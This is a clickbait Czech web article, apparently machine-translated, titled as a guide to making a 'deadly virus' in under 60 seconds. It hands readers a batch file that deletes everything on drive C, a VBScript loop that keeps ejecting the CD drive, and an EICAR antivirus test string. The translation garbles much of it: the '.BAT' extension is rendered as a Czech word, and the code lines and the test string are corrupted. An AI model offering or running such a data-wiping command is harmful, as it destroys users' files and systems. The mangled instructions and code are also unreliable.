Nejlepší

jak vyrobit smrtící virus za méně než 60 sekund, 100% funguje!

co myslíš tím vytvořením viru? Ano, vytvořil jsi svůj vlastní virus. Prostřednictvím tohoto článku vám ApkVenue poradí, jak rychle vytvořit smrtící virus

Při používání počítačů se samozřejmě musíme bát, když to slovo slyšíme VIRUS. Protože tato jediná věc je schopna zaútočit na naše počítače a poškodit systém a může dokonce ukrást naše data. Takže lépe víme, jak vytvořit virus.

Loh, co to znamená vytvořit virus? Ano, vytvořil jsi svůj vlastní virus. No, prostřednictvím tohoto článku vám ApkVenue dá, jak vytvořit smrtící virus velmi rychle, dokonce méně než 60 sekund dokázal jsi to. Nevěří?

  • Jak vyrobit jednoduchý počítačový virus Zde je řešení (část 1)
  • Jak vyrobit jednoduchý počítačový virus Zde je řešení (část 2)
  • Jak vyrobit jednoduchý počítačový virus Zde je řešení (část 3)

Jak zabít virus za méně než 60 sekund!

1. Jak vytvořit nebezpečný virus

Chcete-li vytvořit nebezpečný virus, který je dostatečně smrtící, musíte to udělat pár kroků. Zde jsou kroky:

  • otevřeno poznámkový blok a kopírovat vložit kód níže.

@Echo off Del C: *.* |y

  • Uložte si to s jakýmkoli jménem, ​​důležité je milovat zadní stranu .NETOPÝR. Například Virus.bat. Hotovo.

Tak s tímhle pohon C ty, které jste pro systém používali, budou zcela vymazány. Ve skutečnosti bude poškozen i operační systém počítače. Nezkoušejte to na vlastním počítači.

ZOBRAZIT ČLÁNEK

2. Jak vytvořit CD-ROM virus

Tento krok je snadný. Stačí otevřít poznámkový blok, a zpět kopírovat vložit níže uvedený kód a uložte jej pod názvem CD-ROM.vbs. No, když ty dvojklik soubor, jednotka CD/DVD bude pokračovat v načítání.vysunout. Chcete-li to zastavit, přejděte na Správce úloh a vypnout wscipt.exe.

Set oWMP = CreateObject( WMPlayer.OCX.7 ) Set colCDROMs = oWMP.cdromCollection proveďte if colCDROMs.Count >= 1 then For i = 0 na colCDROMs.Count 1 colCDROMs.Item(i).Eject Next For i = 0 na colCDROMs .Počítat 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop

3. Jak vytvořit virus pro antivirus

Stačí otevřít poznámkový blok a kopírovat vložit kód níže. Pak, pokud váš antivirus skutečně funguje správně, bude tento soubor fungovat okamžitě smazáno pomocí vašeho antiviru. Nezapomeňte soubor pojmenovat pomocí EICAR.COM.

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARDNÍ-ANTIVIROVÝ-TESTOVACÍ SOUBOR!$H+H*

No, to jsou 3 způsoby, jak vytvořit smrtící virus, který zabere méně než 60 sekund. Můžete hledat články o jiných virech nebo si přečíst další články od Jofinna Heriana.

$config[zx-auto] not found$config[zx-overlay] not found